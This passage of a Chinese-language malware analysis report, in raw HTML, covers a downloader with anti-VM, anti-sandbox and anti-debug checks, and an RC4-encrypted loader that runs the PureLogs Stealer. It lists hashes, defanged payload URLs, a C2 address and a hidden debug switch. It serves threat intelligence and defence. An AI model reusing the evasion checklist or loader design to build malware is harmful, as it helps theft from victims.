data-colwidth="151" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">MD5</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">397405106D895815A9BEF8D84445AF5A</span></code></td></tr><tr><td data-colwidth="151" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">类型</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">下载器</span></p></td></tr></tbody></table></p><p data-line="94" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">功能概述</span></strong></p><p data-line="96" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">该模块表现为 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">下载器 + 持久化 + 扩散</span></strong><span leaf=""> 的组合体，包含完整的反虚拟机 / 反沙箱 / 反调试逻辑。<img data-aistatus="1" alt="样本执行链路" class="rich_pages wxw-img" data-ratio="1" data-type="png" data-w="1024" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;" data-imgfileid="100027954" src="https://wechat2rss.xlab.app/img-proxy/?k=fa7ca35e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FjHUbrwW0VwWNpCz615QDiay4aCguSibhHs0icOCn1gEeibHGvvZmAR2bkMhbEzaAlbMkMOzA16YwdVFuZJ2zFQjrZxwCia07LZanYgLho0TOYPaA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><h4 data-line="100" style="margin: 2em 8px 0.5em;color: rgb(0, 82, 217);font-size: calc(17.6px);font-weight: bold;"><span leaf="">反分析对抗机制</span></h4><p data-line="102" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">1.明确命中即退出型检测</span></strong></p><p data-line="104" style="margin: 1.5em 8px 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">样本实现了一系列的反分析机制，一旦检测命中下面的特征，立即设置标志并记录原因，主控逻辑提前返回，后续外联拉取不执行：</span></p><p style="max-width: 100%;overflow-x: auto;"><table style="border-collapse: separate;border-spacing: 0px;border-radius: 6px;margin: 1em auto;color: rgb(51, 51, 51);box-shadow: none;border: 1px solid rgb(208, 215, 227);width: 2528px;"><thead><tr><th style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">检测类型</span></p></th><th style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">检测手段</span></p></th><th style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">命中条件</span></p></th></tr></thead><tbody><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">虚拟化关键字</span></strong></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">环境字符串子串匹配</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">命中 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">hyper-v</span></code><span leaf="">、</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">vmware</span></code><span leaf="">、</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">virtualbox</span></code><span leaf="">、</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">qemu</span></code><span leaf="">、</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">parallels</span></code><span leaf=""> 等</span></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">VirtualBox NAT IP</span></strong></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">执行 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ipconfig</span></code><span leaf=""> 匹配输出</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">发现 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">10.0.2.15</span></code></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">沙箱 DLL</span></strong></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">遍历 DLL 名列表，调用 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">GetModuleHandleA</span></code></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">发现 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">SbieDll.dll</span></code><span leaf=""> 等沙箱/注入模块已加载</span></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">黑名单进程</span></strong></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">CreateToolhelp32Snapshot</span></code><p><span leaf=""> + </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">Process32First/Next</span></code><span leaf=""> 枚举</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">命中 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ida.exe</span></code><span leaf="">、</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">x64dbg.exe</span></code><span leaf="">、</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">windbg.exe</span></code><span leaf="">、</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">wireshark.exe</span></code><span leaf="">、</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">fiddler.exe</span></code><span leaf="">、</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">vmtoolsd.exe</span></code><span leaf="">、</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">vboxservice.exe</span></code><span leaf=""> 等</span></p></td></tr></tbody></table></p><p data-line="114" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">2.阈值累计型检测</span></strong></p><p data-line="116" style="margin: 1.5em 8px 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">对多维度主机信息进行评分，风险阈值累计满足后退出：</span></p><p style="max-width: 100%;overflow-x: auto;"><table style="border-collapse:separate;border-spacing:0px;border-radius:6px;margin:1em auto;color:rgb(51, 51, 51);box-shadow:none;border:1px solid rgb(208, 215, 227);min-width:176px;"><thead><tr><th data-colwidth="151" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">检测维度</span></p></th><th style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">实现方式</span></p></th></tr></thead><tbody><tr><td data-colwidth="151" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">CPU 核数</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">GetSystemInfo</span></code><p><span leaf=""> → </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">dwNumberOfProcessors</span></code></p></td></tr><tr><td data-colwidth="151" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">物理内存</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">GetPhysicallyInstalledSystemMemory</span></code><p><span leaf=""> 换算 GiB</span></p></td></tr><tr><td data-colwidth="151" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">磁盘空间</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">GetDiskFreeSpaceExW</span></code><p><span leaf=""> 获取总容量换算 GiB</span></p></td></tr><tr><td data-colwidth="151" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">屏幕分辨率</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">GetSystemMetrics(SM_CXSCREEN/SM_CYSCREEN)</span></code><p><span leaf=""> 与内置可疑分辨率表比对</span></p></td></tr><tr><td data-colwidth="151" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">运行时长</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">GetTickCount64()/1000</span></code><p><span leaf="">，过短则命中</span></p></td></tr><tr><td data-colwidth="151" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">进程数量</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">遍历快照统计进程数，落入异常范围则命中</span></p></td></tr></tbody></table></p><p data-line="127" style="margin: 1.5em 8px 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">通过以上反分析检测后，样本最终尝试通过以下公开平台 URL 拉取远程载荷并执行（当前部分内容已被清理）：</span></p><p style="max-width: 100%;overflow-x: auto;"><table style="border-collapse:separate;border-spacing:0px;border-radius:6px;margin:1em auto;color:rgb(51, 51, 51);box-shadow:none;border:1px solid rgb(208, 215, 227);min-width:221px;"><thead><tr><th data-colwidth="196" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">平台</span></p></th><th style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">远程载荷地址</span></p></th></tr></thead><tbody><tr><td data-colwidth="196" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">Pastebin</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf=""><a href="https://pastebin[.]com/raw/csi5UqpE" target="_blank">https://pastebin[.]com/raw/csi5UqpE</a></span></code></td></tr><tr><td data-colwidth="196" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">Pastebin</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf=""><a href="https://pastebin[.]com/raw/fTxiyhbL" target="_blank">https://pastebin[.]com/raw/fTxiyhbL</a></span></code></td></tr><tr><td data-colwidth="196" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">snippet.host</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf=""><a href="https://snippet[.]host/wtbtew/raw" target="_blank">https://snippet[.]host/wtbtew/raw</a></span></code></td></tr><tr><td data-colwidth="196" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">snippet.host</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf=""><a href="https://snippet[.]host/iqqmib/raw" target="_blank">https://snippet[.]host/iqqmib/raw</a></span></code></td></tr></tbody></table></p><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h3 data-line="139" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">4.3 样本二：svc_service.exe — RC4 加密 Loader → PureLogs Stealer</span></h3><p data-line="141" style="margin: 1.5em 8px 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">文件信息</span></strong></p><p style="max-width: 100%;overflow-x: auto;"><table style="border-collapse:separate;border-spacing:0px;border-radius:6px;margin:1em auto;color:rgb(51, 51, 51);box-shadow:none;border:1px solid rgb(208, 215, 227);min-width:180px;"><thead><tr><th data-colwidth="155" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">属性</span></p></th><th style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">值</span></p></th></tr></thead><tbody><tr><td data-colwidth="155" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">路径</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">C:\Users\Public\Pictures\DriverController\IntelComponent\svc_service.exe</span></code></td></tr><tr><td data-colwidth="155" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">MD5</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">F9A25264ECF9013D2639875CE7F314CB</span></code></td></tr><tr><td data-colwidth="155" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">类型</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">RC4 加密 Loader</span></p></td></tr><tr><td data-colwidth="155" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">最终载荷</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">PureLogs Stealer</span></strong><p><span leaf="">（.NET 程序集）</span></p></td></tr><tr><td data-colwidth="155" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">C2 地址</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">45.55.35.48:56001</span></code><p><span leaf="">（</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">serverconect[.]cc</span></code><span leaf="">）</span></p></td></tr></tbody></table></p><h4 data-line="151" style="margin: 8px;color: rgb(0, 82, 217);font-size: calc(17.6px);font-weight: bold;"><span leaf="">加载过程</span></h4><p data-line="153" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">该模块在加载阶段</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">不直接发起网络通信</span></strong><span leaf="">，而是将二阶段逻辑以加密形式内嵌于自身 PE 文件的数据区：</span></p><ol style="list-style-type: decimal;padding-left: 1.5em;margin-left: 0px;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf="">Loader 将内嵌加密数据整体拷贝至可写缓冲区</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf="">使用 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">RC4 流密码</span></strong><span leaf="">解密，内嵌加密载荷大小为 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">634,880 字节</span></strong></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf="">解密后加载 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">CLR</span></strong><span leaf=""> 运行时</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf="">在当前进程内执行解密得到的 .NET 托管程序集</span></p></li></ol><h4 data-line="160" style="margin: 2em 8px 0.5em;color: rgb(0, 82, 217);font-size: calc(17.6px);font-weight: bold;"><span leaf="">调试后门</span></h4><p data-line="162" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">该恶意模块内置一个隐藏调试开关参数 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">--johnpidar</span></code><span leaf="">。以该参数启动时，样本进入&#34;调试输出模式&#34;，在控制台打印完整执行链路，</span></p><figure data-line="164" style="margin: 1.5em 8px;color: rgb(51, 51, 51);"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.8715025906735752" data-type="png" data-w="965" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;" data-imgfileid="100027950" src="https://wechat2rss.xlab.app/img-proxy/?k=d293153d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FjHUbrwW0VwWqUDzAM2ttFP1AqHjSyPJb2bTlOy578uW1l1C4V0MOzufOnBblyMjjMhzA18aBibXG3LHtFhAbibm0DbpQIDwuYN2QBEzZ4YU0M%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></figure><h4 data-line="166" style="margin: 2em 8px 0.5em;color: rgb(0, 82, 217);font-size: calc(17.6px);font-weight: bold;"><span leaf="">最终载荷：PureLogs Stealer</span></h4><p data-line="168" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">Dump 得到的 .NET 恶意程序本质为 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">PureLogs</span></strong><span leaf="">（也称 PureLogs Stealer），是一种以 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">MaaS（恶意软件即服务）</span></strong><span leaf=""> 模式在地下论坛出售的信息窃取型恶意软件，具备完备的窃密功能：</span></p><p data-line="170" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">CFF Explorer 查看 dump 得到的 .NET 程序集信息（Portable Executable 32 .NET Assembly，620 KB）：</span></p><figure data-line="172" style="margin: 1.5em 8px;color: rgb(51, 51, 51);"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.9572763684913218" data-type="png" data-w="749" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;" data-imgfileid="100027952" src="https://wechat2rss.xlab.app/img-proxy/?k=a36cbe0b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FjHUbrwW0VwUiaw8miaLWZx3zdaUuDPVFZ2oFo9hdH4Wo5OKVyxHH0TgEGwweYIw8p1NicMDLKpwxfjQwSoB7fJmU5oqHtg92wRJSuCbPOerEq4%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></figure><p data-line="174" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">PureLogs Stealer 回连 C2 地址 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">45.55.35.48</span></code><span leaf="">（</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">serverconect[.]cc</span></code><span leaf="">）的流量记录：</span></p><figure data-line="176" style="margin: 1.5em 8px;color: rgb(51, 51, 51);"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.04351851851851852" data-type="png" data-w="1080" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;" data-imgfileid="100027951" src="https://wechat2rss.xlab.app/img-proxy/?k=4b34db77&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FjHUbrwW0VwV1qWC83GM7kOBo0vsYBc53bGRQkHdTBkbnVhg49gDUBwKiaIoic9niaSOwbv3yGfAtVlzN6wTAEGgXWcVzsqtSgA2ISnpSImAvfw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></figure><p style="max-width: 100%;overflow-x: auto;"><table style="border-collapse:separate;border-spacing:0px;border-radius:6px;margin:1em auto;color:rgb(51, 51, 51);box-shadow:none;border:1px 